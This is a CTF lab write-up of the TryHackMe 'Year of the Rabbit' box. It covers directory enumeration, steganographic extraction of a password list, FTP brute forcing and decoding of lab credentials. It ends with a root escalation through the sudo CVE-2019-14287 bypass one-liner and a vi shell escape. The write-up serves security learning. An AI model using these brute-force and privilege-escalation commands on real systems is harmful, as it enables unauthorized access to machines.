---
layout: post
title:  "THM - Year of the Rabbit"
date:   2020-07-25 06:00:00 +1000
category: hacking
---

## Introduction
*Can you hack into the Year of the Rabbit box without falling down a hole?*  

This is an easy rated box, and I'm a bit concerned that it's an easy exploit hidden behind some annoyingly difficult to find folder on a website; we'll see if that's true.

## nmap
So this one has FTP, SSH and HTTP on port 80. There is no anonymous login on the FTP. It's running vsftpd 3.0.2, which isn't apparently a vulnerable version.

## Webserver
The webserver is just showing the default apache page, so we'll try a basic gobuster with the dirb 'big' wordlist; we quickly find a folder called /assets. This contains two files:

>[VID]	RickRolled.mp4	2020-01-23 00:34 	384M  
[TXT]	style.css	2020-01-23 00:34 	2.9K	 

The style.css file contains a link to **/sup3r_s3cr3t_fl4g.php**, which in turns links to Never Gonna Give You Up on Youtube. 

There is also a message:

*This is happening whether you like it or not... The hint is in the video. If you're stuck here then you're just going to have to bite the bullet!*

We can download the RickRolled video file, and about 1 minute in the audio fades and a voice says that you're 'looking in the wrong place'. So presumably the /assets directory was one of the 'rabbit holes'.

## Burp Suite
One of the nice things about Burp Suite is the 'target' tab, where it collates a list of links on the host. When we take a look there we can find this: 

http://10.10.172.98/intermediary.php?hidden_directory=/WExYY2Cv-qU

Presumably this link was hit when we followed the sup3r_s3cr3t_fl4g.php link earlier. 

Going there reveals a picture:

http://10.10.172.98/WExYY2Cv-qU/Hot_Babe.png

## Stego
Ahhh my favourite, stego. I often find myself referring back to [this](https://0xrick.github.io/lists/stego/) for these CTF stego things. In this case:

{% highlight shell %}
root@kali:/opt/tryhackme/rabbit# zsteg -a Hot_Babe.png 
[?] 1244 bytes of extra data after image end (IEND), offset = 0x73ae7
extradata:0         .. text: "Ot9RrG7h2~24?\nEh, you've earned this. Username for FTP is ftpuser\nOne of these is the password:\nMou+56n%QK8sr\n1618B0AUshw1M\nA56IpIl%1s02u\nvTFbDzX9&Nmu?\nFfF~sfu^UQZmT\n8FF?iKO27b~V0\nua4W~2-@y7dE$\n3j39aMQQ7xFXT\nWb4--CTc4ww*-\nu6oY9?nHv84D&\n0iBp4W69Gr_Yf\nTS*%miyPsGV54\nC77O3FIy0c0sd\nO14xEhgg0Hxz1\n5dpv#Pr$wqH7F\n1G8Ucoce1+gS5\n0plnI%f0~Jw71\n0kLoLzfhqq8u&\nkS9pn5yiFGj6d\nzeff4#!b5Ib_n\nrNT4E4SHDGBkl\nKKH5zy23+S0@B\n3r6PHtM4NzJjE\ngm0!!EC1A0I2?\nHPHr!j00RaDEi\n7N+J9BYSp4uaY\nPYKt-ebvtmWoC\n3TN%cD_E6zm*s\neo?@c!ly3&=0Z\nnR8&FXz$ZPelN\neE4Mu53UkKHx#\n86?004F9!o49d\nSNGY0JjA5@0EE\ntrm64++JZ7R6E\n3zJuGL~8KmiK^\nCR-ItthsH%9du\nyP9kft386bB8G\nA-*eE3L@!4W5o\nGoM^$82l&GA5D\n1t$4$g$I+V_BH\n0XxpTd90Vt8OL\nj0CN?Z#8Bp69_\nG#h~9@5E5QA5l\nDRWNM7auXF7@j\nFw!if_=kk7Oqz\n92d5r$uyw!vaE\nc-AA7a2u!W2*?\nzy8z3kBi#2e36\nJ5%2Hn+7I6QLt\ngL$2fmgnq8vI*\nEtb?i?Kj4R=QM\n7CabD7kwY7=ri\n4uaIRX~-cY6K4\nkY1oxscv4EB2d\nk32?3^x1ex7#o\nep4IPQ_=ku@V8\ntQxFJ909rd1y2\n5L6kpPR5E2Msn\n65NX66Wv~oFP2\nLRAQ@zcBphn!1\nV4bt3*58Z32Xe\nki^t!+uqB?DyI\n5iez1wGXKfPKQ\nnJ90XzX&AnF5v\n7EiMd5!r%=18c\nwYyx6Eq-T^9\#@\nyT2o$2exo~UdW\nZuI-8!JyI6iRS\nPTKM6RsLWZ1&^\n3O$oC~%XUlRO@\nKW3fjzWpUGHSW\nnTzl5f=9eS&*W\nWS9x0ZF=x1%8z\nSr4*E4NT5fOhS\nhLR3xQV*gHYuC\n4P3QgF5kflszS\nNIZ2D%d58*v@R\n0rJ7p%6Axm05K\n94rU30Zx45z5c\nVi^Qf+u%0*q_S\n1Fvdp&bNl3#&l\nzLH%Ot0Bw&c%9\n"
imagedata           .. text: "*>7%OF\" "
b3,r,msb,xy         .. text: "@OXa|j1F"
b3,b,msb,xy         .. text: "e0\n5@m0gMm"
**snip**
{% endhighlight %}

So we've got an FTP user name and a bunch of potential passwords (about 80 of them).

## FTPBruter
I put the passwords into a file called plist.txt and ran it through FTPBruter:

{% highlight shell %}
[i] FTPBruter - A FTP server Brute forcing tool written in Python 3
    Author: https://GitHackTools.blogspot.com 

[-] Enter the target address: 10.10.172.98
[?] Do you want to use username list? [Y/n]: n
[-] Enter username: ftpuser
[-] Enter the path of wordlisplist.txt         
[i] Brute force is performing...

[i] Brute force has done!
    Username :  ftpuser
    Password :  5iez1wGXKfPKQ

[i] Press Ctrl+C to exit right now!
{% endhighlight %}

## FTP
We've got one file:

{% highlight shell %}
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jan 23  2020 .
drwxr-xr-x    2 0        0            4096 Jan 23  2020 ..
-rw-r--r--    1 0        0             758 Jan 23  2020 Elis_Creds.txt
226 Directory send OK.
{% endhighlight %}

When we get the file, it's BrainF*** code. Um....yeah.

## BF
We can paste the code into [this site](https://copy.sh/brainfuck/) and extract the credentials:

{% highlight shell %}
User: eli
Password: DSpDiM1wAEwid
{% endhighlight %}

# SSH
So these are SSH creds for eli, and when we log in we see this:

>*1 new message
Message from Root to Gwendoline:  
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place.   I've left you a hidden message there"  
END MESSAGE*  

When we **cat /etc/passwd**, we can see there is indeed a user called gwendoline, and it seems like we need to find a message left for her.

## Search by date
No doubt there are a few ways to find this, but looking around we can see that many of the files were created on Jan 23 2020, so let's search for that:
{% highlight shell %}
eli@year-of-the-rabbit:/$ find . -type f -ls 2>/dev/null | grep 'Jan 23'
{% endhighlight %}
Bingo!
{% highlight shell %}
36980    4 -rw-r--r--   1 root     root          138 Jan 23  2020 ./usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
{% endhighlight %}
What does it say?

>*Your password is awful, Gwendoline.   
It should be at least 60 characters long! Not just MniVCQVhQHUNI  
Honestly!  
Yours sincerely  
   -Root*

So with this information we can su as gwendoline.

## Gwendoline

Running **sudo -l** we can see this:
{% highlight shell %}
User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
{% endhighlight %}    
The version of sudo we have is 1.8.10p3, which is vulnerable to CVE-2019-14287 and that means we can do this:
{% highlight shell %}
gwendoline@year-of-the-rabbit:/etc$ sudo -u \#$((0xffffffff)) /usr/bin/vi /home/gwendoline/user.txt
{% endhighlight %}
And once we're in vi, we can do **:!/bin/sh** - and we've got a root shell.
